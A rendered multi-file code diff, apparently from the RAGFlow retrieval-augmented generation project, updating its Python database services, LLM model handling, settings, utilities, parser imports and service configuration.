return folder.to_dict()
assert False, "Can't find the KB folder. Database init error."
@classmethod
@DB.connection_context()
def new_a_file_from_kb(cls, tenant_id, name, parent_id, ty=FileType.FOLDER.value, size=0, location=""):
for file in cls.query(tenant_id=tenant_id, parent_id=parent_id, name=name):
return file.to_dict()
file = {
"id": get_uuid(),
"parent_id": parent_id,
"tenant_id": tenant_id,
"created_by": tenant_id,
"name": name,
"type": ty,
"size": size,
"location": location,
"source_type": FileSource.KNOWLEDGEBASE
}
cls.save(**file)
return file
@classmethod
@DB.connection_context()
def init_knowledgebase_docs(cls, root_id, tenant_id):
for _ in cls.model.select().where((cls.model.name == KNOWLEDGEBASE_FOLDER_NAME)\
& (cls.model.parent_id == root_id)):
return
folder = cls.new_a_file_from_kb(tenant_id, KNOWLEDGEBASE_FOLDER_NAME, root_id)
for kb in Knowledgebase.select(*[Knowledgebase.id, Knowledgebase.name]).where(Knowledgebase.tenant_id==tenant_id):
kb_folder = cls.new_a_file_from_kb(tenant_id, kb.name, folder["id"])
for doc in DocumentService.query(kb_id=kb.id):
FileService.add_file_from_kb(doc.to_dict(), kb_folder["id"], tenant_id)
@classmethod
@DB.connection_context()
def get_parent_folder(cls, file_id):
@ -241,3 +287,29 @@ class FileService(CommonService):
dfs(folder_id)
return size
@classmethod
@DB.connection_context()
def add_file_from_kb(cls, doc, kb_folder_id, tenant_id):
for _ in File2DocumentService.get_by_document_id(doc["id"]): return
file = {
"id": get_uuid(),
"parent_id": kb_folder_id,
"tenant_id": tenant_id,
"created_by": tenant_id,
"name": doc["name"],
"type": doc["type"],
"size": doc["size"],
"location": doc["location"],
"source_type": FileSource.KNOWLEDGEBASE
}
cls.save(**file)
File2DocumentService.save(**{"id": get_uuid(), "file_id": file["id"], "document_id": doc["id"]})
@classmethod
@DB.connection_context()
def move_file(cls, file_ids, folder_id):
try:
cls.filter_update((cls.model.id << file_ids, ), { 'parent_id': folder_id })
except Exception as e:
print(e)
raise RuntimeError("Database error (File move)!")

@ -1,67 +0,0 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from api.db import TenantPermission
from api.db.db_models import DB, Tenant
from api.db.db_models import Knowledgebase
from api.db.services.common_service import CommonService
from api.db import StatusEnum
class KnowledgebaseService(CommonService):
model = Knowledgebase
@classmethod
@DB.connection_context()
def get_by_tenant_ids(cls, joined_tenant_ids, user_id,
page_number, items_per_page, orderby, desc):
kbs = cls.model.select().where(
((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
TenantPermission.TEAM.value)) | (cls.model.tenant_id == user_id))
& (cls.model.status == StatusEnum.VALID.value)
)
if desc:
kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
else:
kbs = kbs.order_by(cls.model.getter_by(orderby).asc())
kbs = kbs.paginate(page_number, items_per_page)
return list(kbs.dicts())
@classmethod
@DB.connection_context()
def get_detail(cls, kb_id):
fields = [
cls.model.id,
Tenant.embd_id,
cls.model.avatar,
cls.model.name,
cls.model.description,
cls.model.permission,
cls.model.doc_num,
cls.model.token_num,
cls.model.chunk_num,
cls.model.parser_id]
kbs = cls.model.select(*fields).join(Tenant, on=((Tenant.id == cls.model.tenant_id)&(Tenant.status== StatusEnum.VALID.value))).where(
(cls.model.id == kb_id),
(cls.model.status == StatusEnum.VALID.value)
)
if not kbs:
return
d = kbs[0].to_dict()
d["embd_id"] = kbs[0].tenant.embd_id
return d

@ -40,6 +40,31 @@ class KnowledgebaseService(CommonService):
return list(kbs.dicts())
@classmethod
@DB.connection_context()
def get_by_tenant_ids_by_offset(cls, joined_tenant_ids, user_id, offset, count, orderby, desc):
kbs = cls.model.select().where(
((cls.model.tenant_id.in_(joined_tenant_ids) & (cls.model.permission ==
TenantPermission.TEAM.value)) | (
cls.model.tenant_id == user_id))
& (cls.model.status == StatusEnum.VALID.value)
)
if desc:
kbs = kbs.order_by(cls.model.getter_by(orderby).desc())
else:
kbs = kbs.order_by(cls.model.getter_by(orderby).asc())
kbs = list(kbs.dicts())
kbs_length = len(kbs)
if offset < 0 or offset > kbs_length:
raise IndexError("Offset is out of the valid range.")
if count == -1:
return kbs[offset:]
return kbs[offset:offset+count]
@classmethod
@DB.connection_context()
def get_detail(cls, kb_id):
@ -112,3 +137,8 @@ class KnowledgebaseService(CommonService):
if kb:
return True, kb[0]
return False, None
@classmethod
@DB.connection_context()
def get_all_ids(cls):
return [m["id"] for m in cls.model.select(cls.model.id).dicts()]

@ -15,7 +15,7 @@
#
from api.db.services.user_service import TenantService
from api.settings import database_logger
from rag.llm import EmbeddingModel, CvModel, ChatModel
from rag.llm import EmbeddingModel, CvModel, ChatModel, RerankModel, Seq2txtModel
from api.db import LLMType
from api.db.db_models import DB, UserTenant
from api.db.db_models import LLMFactories, LLM, TenantLLM
@ -70,24 +70,28 @@ class TenantLLMService(CommonService):
elif llm_type == LLMType.SPEECH2TEXT.value:
mdlnm = tenant.asr_id
elif llm_type == LLMType.IMAGE2TEXT.value:
mdlnm = tenant.img2txt_id
mdlnm = tenant.img2txt_id if not llm_name else llm_name
elif llm_type == LLMType.CHAT.value:
mdlnm = tenant.llm_id if not llm_name else llm_name
elif llm_type == LLMType.RERANK:
mdlnm = tenant.rerank_id if not llm_name else llm_name
else:
assert False, "LLM type error"
model_config = cls.get_api_key(tenant_id, mdlnm)
if model_config: model_config = model_config.to_dict()
if not model_config:
if llm_type == LLMType.EMBEDDING.value:
llm = LLMService.query(llm_name=llm_name)
if llm and llm[0].fid in ["Youdao", "FastEmbed"]:
model_config = {"llm_factory": llm[0].fid, "api_key":"", "llm_name": llm_name, "api_base": ""}
if llm_type in [LLMType.EMBEDDING, LLMType.RERANK]:
llm = LLMService.query(llm_name=llm_name if llm_name else mdlnm)
if llm and llm[0].fid in ["Youdao", "FastEmbed", "BAAI"]:
model_config = {"llm_factory": llm[0].fid, "api_key":"", "llm_name": llm_name if llm_name else mdlnm, "api_base": ""}
if not model_config:
if llm_name == "flag-embedding":
model_config = {"llm_factory": "Tongyi-Qianwen", "api_key": "",
"llm_name": llm_name, "api_base": ""}
else:
if not mdlnm:
raise LookupError(f"Type of {llm_type} model is not set.")
raise LookupError("Model({}) not authorized".format(mdlnm))
if llm_type == LLMType.EMBEDDING.value:
@ -96,6 +100,12 @@ class TenantLLMService(CommonService):
return EmbeddingModel[model_config["llm_factory"]](
model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])
if llm_type == LLMType.RERANK:
if model_config["llm_factory"] not in RerankModel:
return
return RerankModel[model_config["llm_factory"]](
model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])
if llm_type == LLMType.IMAGE2TEXT.value:
if model_config["llm_factory"] not in CvModel:
return
@ -110,6 +120,14 @@ class TenantLLMService(CommonService):
return ChatModel[model_config["llm_factory"]](
model_config["api_key"], model_config["llm_name"], base_url=model_config["api_base"])
if llm_type == LLMType.SPEECH2TEXT:
if model_config["llm_factory"] not in Seq2txtModel:
return
return Seq2txtModel[model_config["llm_factory"]](
model_config["api_key"], model_config["llm_name"], lang,
base_url=model_config["api_base"]
)
@classmethod
@DB.connection_context()
def increase_usage(cls, tenant_id, llm_type, used_tokens, llm_name=None):
@ -125,16 +143,31 @@ class TenantLLMService(CommonService):
mdlnm = tenant.img2txt_id
elif llm_type == LLMType.CHAT.value:
mdlnm = tenant.llm_id if not llm_name else llm_name
elif llm_type == LLMType.RERANK:
mdlnm = tenant.rerank_id if not llm_name else llm_name
else:
assert False, "LLM type error"
num = 0
for u in cls.query(tenant_id = tenant_id, llm_name=mdlnm):
num += cls.model.update(used_tokens = u.used_tokens + used_tokens)\
.where(cls.model.tenant_id == tenant_id, cls.model.llm_name == mdlnm)\
.execute()
try:
for u in cls.query(tenant_id = tenant_id, llm_name=mdlnm):
num += cls.model.update(used_tokens = u.used_tokens + used_tokens)\
.where(cls.model.tenant_id == tenant_id, cls.model.llm_name == mdlnm)\
.execute()
except Exception as e:
pass
return num
@classmethod
@DB.connection_context()
def get_openai_models(cls):
objs = cls.model.select().where(
(cls.model.llm_factory == "OpenAI"),
~(cls.model.llm_name == "text-embedding-3-small"),
~(cls.model.llm_name == "text-embedding-3-large")
).dicts()
return list(objs)
class LLMBundle(object):
def __init__(self, tenant_id, llm_type, llm_name=None, lang="Chinese"):
@ -145,6 +178,10 @@ class LLMBundle(object):
tenant_id, llm_type, llm_name, lang=lang)
assert self.mdl, "Can't find model for {}/{}/{}".format(
tenant_id, llm_type, llm_name)
self.max_length = 512
for lm in LLMService.query(llm_name=llm_name):
self.max_length = lm.max_tokens
break
def encode(self, texts: list, batch_size=32):
emd, used_tokens = self.mdl.encode(texts, batch_size)
@ -162,6 +199,14 @@ class LLMBundle(object):
"Can't update token usage for {}/EMBEDDING".format(self.tenant_id))
return emd, used_tokens
def similarity(self, query: str, texts: list):
sim, used_tokens = self.mdl.similarity(query, texts)
if not TenantLLMService.increase_usage(
self.tenant_id, self.llm_type, used_tokens):
database_logger.error(
"Can't update token usage for {}/RERANK".format(self.tenant_id))
return sim, used_tokens
def describe(self, image, max_tokens=300):
txt, used_tokens = self.mdl.describe(image, max_tokens)
if not TenantLLMService.increase_usage(
@ -170,10 +215,28 @@ class LLMBundle(object):
"Can't update token usage for {}/IMAGE2TEXT".format(self.tenant_id))
return txt
def transcription(self, audio):
txt, used_tokens = self.mdl.transcription(audio)
if not TenantLLMService.increase_usage(
self.tenant_id, self.llm_type, used_tokens):
database_logger.error(
"Can't update token usage for {}/SEQUENCE2TXT".format(self.tenant_id))
return txt
def chat(self, system, history, gen_conf):
txt, used_tokens = self.mdl.chat(system, history, gen_conf)
if TenantLLMService.increase_usage(
if not TenantLLMService.increase_usage(
self.tenant_id, self.llm_type, used_tokens, self.llm_name):
database_logger.error(
"Can't update token usage for {}/CHAT".format(self.tenant_id))
return txt
def chat_streamly(self, system, history, gen_conf):
for txt in self.mdl.chat_streamly(system, history, gen_conf):
if isinstance(txt, int):
if not TenantLLMService.increase_usage(
self.tenant_id, self.llm_type, txt, self.llm_name):
database_logger.error(
"Can't update token usage for {}/CHAT".format(self.tenant_id))
return
yield txt
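
`LLMBundle.chat_streamly` above relies on a small convention: the underlying model generator yields text items and finishes with an `int` carrying the token count, which the wrapper records instead of forwarding. A minimal sketch of that convention follows; `fake_model_stream` and `stream_with_usage` are hypothetical names used only for illustration.

```python
def fake_model_stream():
    """Hypothetical model stream: cumulative text first, token total (int) last."""
    yield "Hel"
    yield "Hello"
    yield 7


def stream_with_usage(model_stream, record_usage):
    """Forward text items; intercept the trailing int and record it as usage."""
    for item in model_stream:
        if isinstance(item, int):
            record_usage(item)
            return
        yield item


usage = []
chunks = list(stream_with_usage(fake_model_stream(), usage.append))
print(chunks, usage)
```

Mixing two item types in one generator keeps the interface small, but every consumer must check the type before treating an item as text.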

@ -13,6 +13,7 @@
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import random
from api.db.db_utils import bulk_insert_into_db
@ -53,6 +54,7 @@ class TaskService(CommonService):
Knowledgebase.embd_id,
Tenant.img2txt_id,
Tenant.asr_id,
Tenant.llm_id,
cls.model.update_time]
docs = cls.model.select(*fields) \
.join(Document, on=(cls.model.doc_id == Document.id)) \
@ -96,11 +98,20 @@ class TaskService(CommonService):
return doc.run == TaskStatus.CANCEL.value or doc.progress < 0
except Exception as e:
pass
return True
return False
@classmethod
@DB.connection_context()
def update_progress(cls, id, info):
if os.environ.get("MACOS"):
if info["progress_msg"]:
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
cls.model.id == id).execute()
if "progress" in info:
cls.model.update(progress=info["progress"]).where(
cls.model.id == id).execute()
return
with DB.lock("update_progress", -1):
if info["progress_msg"]:
cls.model.update(progress_msg=cls.model.progress_msg + "\n" + info["progress_msg"]).where(
@ -128,6 +139,8 @@ def queue_tasks(doc, bucket, name):
page_size = doc["parser_config"].get("task_page_size", 22)
if doc["parser_id"] == "one":
page_size = 1000000000
if doc["parser_id"] == "knowledge_graph":
page_size = 1000000000
if not do_layout:
page_size = 1000000000
page_ranges = doc["parser_config"].get("pages")
@ -159,4 +172,4 @@ def queue_tasks(doc, bucket, name):
DocumentService.begin2parse(doc["id"])
for t in tsks:
REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=t)
assert REDIS_CONN.queue_product(SVR_QUEUE_NAME, message=t), "Can't access Redis. Please check the Redis' status."

@ -93,6 +93,7 @@ class TenantService(CommonService):
cls.model.name,
cls.model.llm_id,
cls.model.embd_id,
cls.model.rerank_id,
cls.model.asr_id,
cls.model.img2txt_id,
cls.model.parser_ids,

@ -34,6 +34,7 @@ chat_logger = getLogger("chat")
from rag.utils.es_conn import ELASTICSEARCH
from rag.nlp import search
from graphrag import search as kg_search
from api.utils import get_base_config, decrypt_database_config
API_VERSION = "v1"
@ -69,6 +70,12 @@ default_llm = {
"image2text_model": "gpt-4-vision-preview",
"asr_model": "whisper-1",
},
"Azure-OpenAI": {
"chat_model": "azure-gpt-35-turbo",
"embedding_model": "azure-text-embedding-ada-002",
"image2text_model": "azure-gpt-4-vision-preview",
"asr_model": "azure-whisper-1",
},
"ZHIPU-AI": {
"chat_model": "glm-3-turbo",
"embedding_model": "embedding-2",
@ -86,6 +93,25 @@ default_llm = {
"embedding_model": "",
"image2text_model": "",
"asr_model": "",
},
"DeepSeek": {
"chat_model": "deepseek-chat",
"embedding_model": "",
"image2text_model": "",
"asr_model": "",
},
"VolcEngine": {
"chat_model": "",
"embedding_model": "",
"image2text_model": "",
"asr_model": "",
},
"BAAI": {
"chat_model": "",
"embedding_model": "BAAI/bge-large-zh-v1.5",
"image2text_model": "",
"asr_model": "",
"rerank_model": "BAAI/bge-reranker-v2-m3",
}
}
LLM = get_base_config("user_default_llm", {})
@ -98,14 +124,15 @@ if LLM_FACTORY not in default_llm:
f"LLM factory {LLM_FACTORY} is not supported yet; switching to 'Tongyi-Qianwen/QWen' automatically. Please check the API_KEY in service_conf.yaml.")
LLM_FACTORY = "Tongyi-Qianwen"
CHAT_MDL = default_llm[LLM_FACTORY]["chat_model"]
EMBEDDING_MDL = default_llm[LLM_FACTORY]["embedding_model"]
EMBEDDING_MDL = default_llm["BAAI"]["embedding_model"]
RERANK_MDL = default_llm["BAAI"]["rerank_model"]
ASR_MDL = default_llm[LLM_FACTORY]["asr_model"]
IMAGE2TEXT_MDL = default_llm[LLM_FACTORY]["image2text_model"]
API_KEY = LLM.get("api_key", "")
PARSERS = LLM.get(
"parsers",
"naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One")
"naive:General,qa:Q&A,resume:Resume,manual:Manual,table:Table,paper:Paper,book:Book,laws:Laws,presentation:Presentation,picture:Picture,one:One,audio:Audio,knowledge_graph:Knowledge Graph")
# distribution
DEPENDENT_DISTRIBUTION = get_base_config("dependent_distribution", False)
@ -152,6 +179,7 @@ CLIENT_AUTHENTICATION = AUTHENTICATION_CONF.get(
"switch", False)
HTTP_APP_KEY = AUTHENTICATION_CONF.get("client", {}).get("http_app_key")
GITHUB_OAUTH = get_base_config("oauth", {}).get("github")
FEISHU_OAUTH = get_base_config("oauth", {}).get("feishu")
WECHAT_OAUTH = get_base_config("oauth", {}).get("wechat")
# site
@ -177,6 +205,7 @@ PRIVILEGE_COMMAND_WHITELIST = []
CHECK_NODES_IDENTITY = False
retrievaler = search.Dealer(ELASTICSEARCH)
kg_retrievaler = kg_search.KGSearch(ELASTICSEARCH)
class CustomEnum(Enum):
@ -218,4 +247,5 @@ class RetCode(IntEnum, CustomEnum):
RUNNING = 106
PERMISSION_ERROR = 108
AUTHENTICATION_ERROR = 109
UNAUTHORIZED = 401
SERVER_ERROR = 500

@ -25,7 +25,6 @@ from flask import (
from werkzeug.http import HTTP_STATUS_CODES
from api.utils import json_dumps
from api.versions import get_rag_version
from api.settings import RetCode
from api.settings import (
REQUEST_MAX_WAIT_SEC, REQUEST_WAIT_SEC,
@ -39,7 +38,6 @@ from base64 import b64encode
from hmac import HMAC
from urllib.parse import quote, urlencode
requests.models.complexjson.dumps = functools.partial(
json.dumps, cls=CustomJSONEncoder)
@ -84,9 +82,6 @@ def request(**kwargs):
return sess.send(prepped, stream=stream, timeout=timeout)
rag_version = get_rag_version() or ''
def get_exponential_backoff_interval(retries, full_jitter=False):
"""Calculate the exponential backoff wait time."""
# Will be zero if factor equals 0
@ -149,7 +144,7 @@ def server_error_response(e):
if len(e.args) > 1:
return get_json_result(
retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e.args[0]), data=e.args[1])
if repr(e).find("index_not_found_exception") >=0:
if repr(e).find("index_not_found_exception") >= 0:
return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg="No chunk found, please upload file and parse it.")
return get_json_result(retcode=RetCode.EXCEPTION_ERROR, retmsg=repr(e))
@ -239,3 +234,36 @@ def cors_reponse(retcode=RetCode.SUCCESS,
    response.headers["Access-Control-Allow-Headers"] = "*"
    response.headers["Access-Control-Expose-Headers"] = "Authorization"
    return response


def construct_result(code=RetCode.DATA_ERROR, message='data is missing'):
    import re
    result_dict = {"code": code, "message": re.sub(r"rag", "seceum", message, flags=re.IGNORECASE)}
    response = {}
    for key, value in result_dict.items():
        if value is None and key != "code":
            continue
        else:
            response[key] = value
    return jsonify(response)


def construct_json_result(code=RetCode.SUCCESS, message='success', data=None):
    if data is None:
        return jsonify({"code": code, "message": message})
    else:
        return jsonify({"code": code, "message": message, "data": data})


def construct_error_response(e):
    stat_logger.exception(e)
    try:
        if e.code == 401:
            return construct_json_result(code=RetCode.UNAUTHORIZED, message=repr(e))
    except BaseException:
        pass
    if len(e.args) > 1:
        return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e.args[0]), data=e.args[1])
    if repr(e).find("index_not_found_exception") >= 0:
        return construct_json_result(code=RetCode.EXCEPTION_ERROR, message="No chunk found, please upload file and parse it.")
    return construct_json_result(code=RetCode.EXCEPTION_ERROR, message=repr(e))
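The response envelope built by `construct_json_result` above can be sketched without Flask. This is only an illustration under stated assumptions: `build_result` is a hypothetical helper, and the integer codes are placeholders, since the real `RetCode` values are not visible in this diff.

```python
import json

# Placeholder codes: the real RetCode values are not shown in this diff.
SUCCESS = 0
EXCEPTION_ERROR = 100


def build_result(code=SUCCESS, message="success", data=None):
    """Return the response body as a plain dict, omitting "data" when it is None."""
    body = {"code": code, "message": message}
    if data is not None:
        body["data"] = data
    return body


print(json.dumps(build_result()))
print(json.dumps(build_result(EXCEPTION_ERROR, "boom", data={"hint": "retry"})))
```

Leaving out the `data` key instead of sending `null` keeps successful responses with no payload as small as possible, which matches the branch on `data is None` in the hunk.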

api/utils/commands.py Normal file

@ -0,0 +1,78 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import base64
import click
import re

from flask import Flask
from werkzeug.security import generate_password_hash

from api.db.services import UserService


@click.command('reset-password', help='Reset the account password.')
@click.option('--email', prompt=True, help='The email address of the account whose password you need to reset.')
@click.option('--new-password', prompt=True, help='The new password.')
@click.option('--password-confirm', prompt=True, help='Confirm the new password.')
def reset_password(email, new_password, password_confirm):
    if str(new_password).strip() != str(password_confirm).strip():
        click.echo(click.style('Sorry, the two passwords do not match.', fg='red'))
        return
    user = UserService.query(email=email)
    if not user:
        click.echo(click.style('Sorry, the email is not registered.', fg='red'))
        return
    # The stored hash is computed over the Base64-encoded password.
    encode_password = base64.b64encode(new_password.encode('utf-8')).decode('utf-8')
    password_hash = generate_password_hash(encode_password)
    user_dict = {
        'password': password_hash
    }
    UserService.update_user(user[0].id, user_dict)
    click.echo(click.style('Congratulations! Password has been reset.', fg='green'))


@click.command('reset-email', help='Reset the account email.')
@click.option('--email', prompt=True, help='The old email address of the account whose email you need to reset.')
@click.option('--new-email', prompt=True, help='The new email.')
@click.option('--email-confirm', prompt=True, help='Confirm the new email.')
def reset_email(email, new_email, email_confirm):
    if str(new_email).strip() != str(email_confirm).strip():
        click.echo(click.style('Sorry, new email and confirm email do not match.', fg='red'))
        return
    if str(new_email).strip() == str(email).strip():
        click.echo(click.style('Sorry, new email and old email are the same.', fg='red'))
        return
    user = UserService.query(email=email)
    if not user:
        click.echo(click.style('Sorry, the account [{}] does not exist.'.format(email), fg='red'))
        return
    if not re.match(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,4}$", new_email):
        click.echo(click.style('Sorry, {} is not a valid email.'.format(new_email), fg='red'))
        return
    new_user = UserService.query(email=new_email)
    if new_user:
        click.echo(click.style('Sorry, the account [{}] already exists.'.format(new_email), fg='red'))
        return
    user_dict = {
        'email': new_email
    }
    UserService.update_user(user[0].id, user_dict)
    click.echo(click.style('Congratulations! Email has been reset.', fg='green'))


def register_commands(app: Flask):
    app.cli.add_command(reset_password)
    app.cli.add_command(reset_email)
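To see which addresses the validation in `reset_email` accepts, the pattern can be exercised on its own. The sketch below copies the regular expression from the command; `looks_like_email` is a hypothetical helper name. Note that the final label is limited to 2 to 4 characters, so longer top-level domains are rejected.

```python
import re

# Same pattern as in reset_email above.
EMAIL_PATTERN = r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,4}$"


def looks_like_email(address: str) -> bool:
    """Return True when the address passes the reset_email pattern."""
    return re.match(EMAIL_PATTERN, address) is not None


for candidate in (
    "user@example.com",
    "user@sub.example.io",
    "user@example.museum",  # final label longer than 4 characters
    "no-at-sign.com",
):
    print(candidate, looks_like_email(candidate))
```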

View File

@ -156,7 +156,7 @@ def filename_type(filename):
return FileType.PDF.value
if re.match(
r".*\.(doc|docx|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp|pages|numbers|key|md)$", filename):
r".*\.(doc|docx|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp|pages|numbers|key|md|py|js|java|c|cpp|h|php|go|ts|sh|cs|kt|html)$", filename):
return FileType.DOC.value
if re.match(
@ -174,7 +174,7 @@ def thumbnail(filename, blob):
if re.match(r".*\.pdf$", filename):
pdf = pdfplumber.open(BytesIO(blob))
buffered = BytesIO()
pdf.pages[0].to_image().annotated.save(buffered, format="png")
pdf.pages[0].to_image(resolution=32).annotated.save(buffered, format="png")
return "data:image/png;base64," + \
base64.b64encode(buffered.getvalue()).decode("utf-8")
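The first hunk above extends the document-type pattern in `filename_type` with source-code extensions and `html`. A minimal sketch of that check follows; `is_doc_like` is a hypothetical name, and lower-casing the filename is an assumption of this sketch because the surrounding function body is not shown in the diff.

```python
import re

# Extension list copied from the updated pattern in filename_type.
DOC_PATTERN = re.compile(
    r".*\.(doc|docx|ppt|pptx|yml|xml|htm|json|csv|txt|ini|xls|xlsx|wps|rtf|hlp"
    r"|pages|numbers|key|md|py|js|java|c|cpp|h|php|go|ts|sh|cs|kt|html)$"
)


def is_doc_like(filename: str) -> bool:
    """Return True when the extension is in the document-type list."""
    # Assumption: names are compared case-insensitively by lower-casing first.
    return DOC_PATTERN.match(filename.lower()) is not None


for name in ("main.py", "index.HTML", "notes.md", "photo.png", "Makefile"):
    print(name, is_doc_like(name))
```

Because the pattern ends with `$`, `htm` and `html` have to be listed separately; `htm` alone would not match a name ending in `.html`.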

View File

@ -11,10 +11,11 @@ def crypt(line):
file_utils.get_project_base_directory(),
"conf",
"public.pem")
rsa_key = RSA.importKey(open(file_path).read())
rsa_key = RSA.importKey(open(file_path).read(),"Welcome")
cipher = Cipher_pkcs1_v1_5.new(rsa_key)
return base64.b64encode(cipher.encrypt(
line.encode('utf-8'))).decode("utf-8")
password_base64 = base64.b64encode(line.encode('utf-8')).decode("utf-8")
encrypted_password = cipher.encrypt(password_base64.encode())
return base64.b64encode(encrypted_password).decode('utf-8')
if __name__ == "__main__":

api/utils/web_utils.py Normal file

@ -0,0 +1,80 @@
import re
import json
import base64

from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.expected_conditions import staleness_of
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.common.by import By


def html2pdf(
    source: str,
    timeout: int = 2,
    install_driver: bool = True,
    print_options: dict = {},
):
    result = __get_pdf_from_html(source, timeout, install_driver, print_options)
    return result


def __send_devtools(driver, cmd, params={}):
    resource = "/session/%s/chromium/send_command_and_get_result" % driver.session_id
    url = driver.command_executor._url + resource
    body = json.dumps({"cmd": cmd, "params": params})
    response = driver.command_executor._request("POST", url, body)

    if not response:
        raise Exception(response.get("value"))

    return response.get("value")


def __get_pdf_from_html(
    path: str,
    timeout: int,
    install_driver: bool,
    print_options: dict
):
    webdriver_options = Options()
    webdriver_prefs = {}
    webdriver_options.add_argument("--headless")
    webdriver_options.add_argument("--disable-gpu")
    webdriver_options.add_argument("--no-sandbox")
    webdriver_options.add_argument("--disable-dev-shm-usage")
    webdriver_options.experimental_options["prefs"] = webdriver_prefs

    webdriver_prefs["profile.default_content_settings"] = {"images": 2}

    if install_driver:
        service = Service(ChromeDriverManager().install())
        driver = webdriver.Chrome(service=service, options=webdriver_options)
    else:
        driver = webdriver.Chrome(options=webdriver_options)

    driver.get(path)

    try:
        WebDriverWait(driver, timeout).until(
            staleness_of(driver.find_element(by=By.TAG_NAME, value="html"))
        )
    except TimeoutException:
        calculated_print_options = {
            "landscape": False,
            "displayHeaderFooter": False,
            "printBackground": True,
            "preferCSSPageSize": True,
        }
        calculated_print_options.update(print_options)
        result = __send_devtools(
            driver, "Page.printToPDF", calculated_print_options)
        driver.quit()
        return base64.b64decode(result["data"])


def is_valid_url(url: str) -> bool:
    return bool(re.match(r"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]", url))
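Since `is_valid_url` uses `re.match`, the pattern is anchored only at the start of the string, so an input with trailing characters outside the allowed set is still accepted. The sketch below repeats the function next to a hypothetical stricter variant, `is_valid_url_strict`, which uses `re.fullmatch`. The variant is not part of this diff and is shown only to illustrate the difference.

```python
import re

# Pattern copied from is_valid_url above.
URL_PATTERN = r"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]"


def is_valid_url(url: str) -> bool:
    # Same check as in the diff: only a prefix of the string has to match.
    return bool(re.match(URL_PATTERN, url))


def is_valid_url_strict(url: str) -> bool:
    # Hypothetical variant: the whole string has to match.
    return bool(re.fullmatch(URL_PATTERN, url))


for candidate in ("https://example.com/a?b=1", "example.com", "https://exa mple"):
    print(repr(candidate), is_valid_url(candidate), is_valid_url_strict(candidate))
```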

View File

@ -14,17 +14,15 @@
# limitations under the License.
#
import os
import dotenv
import typing
from api.utils.file_utils import get_project_base_directory
def get_versions() -> typing.Mapping[str, typing.Any]:
return dotenv.dotenv_values(
dotenv_path=os.path.join(get_project_base_directory(), "rag.env")
)
dotenv.load_dotenv(dotenv.find_dotenv())
return dotenv.dotenv_values()
def get_rag_version() -> typing.Optional[str]:
return get_versions().get("RAG")
return get_versions().get("RAGFLOW_VERSION", "dev")

conf/llm_factories.json Normal file

File diff suppressed because it is too large

View File

@ -15,6 +15,8 @@ minio:
host: 'minio:9000'
es:
hosts: 'http://es01:9200'
username: 'elastic'
password: 'infini_rag_flow'
redis:
db: 1
password: 'infini_rag_flow'
@ -28,6 +30,12 @@ oauth:
client_id: xxxxxxxxxxxxxxxxxxxxxxxxx
secret_key: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
url: https://github.com/login/oauth/access_token
feishu:
app_id: cli_xxxxxxxxxxxxxxxxxxx
app_secret: xxxxxxxxxxxxxxxxxxxxxxxxxxxx
app_access_token_url: https://open.feishu.cn/open-apis/auth/v3/app_access_token/internal
user_access_token_url: https://open.feishu.cn/open-apis/authen/v1/oidc/access_token
grant_type: 'authorization_code'
authentication:
client:
switch: false
@ -38,4 +46,4 @@ authentication:
permission:
switch: false
component: false
dataset: false
dataset: false

View File

@ -1,6 +1,20 @@
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .pdf_parser import RAGFlowPdfParser as PdfParser, PlainParser
from .docx_parser import RAGFlowDocxParser as DocxParser
from .excel_parser import RAGFlowExcelParser as ExcelParser
from .ppt_parser import RAGFlowPptParser as PptParser
from .html_parser import RAGFlowHtmlParser as HtmlParser
from .json_parser import RAGFlowJsonParser as JsonParser
from .markdown_parser import RAGFlowMarkdownParser as MarkdownParser

View File

@ -1,4 +1,16 @@
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
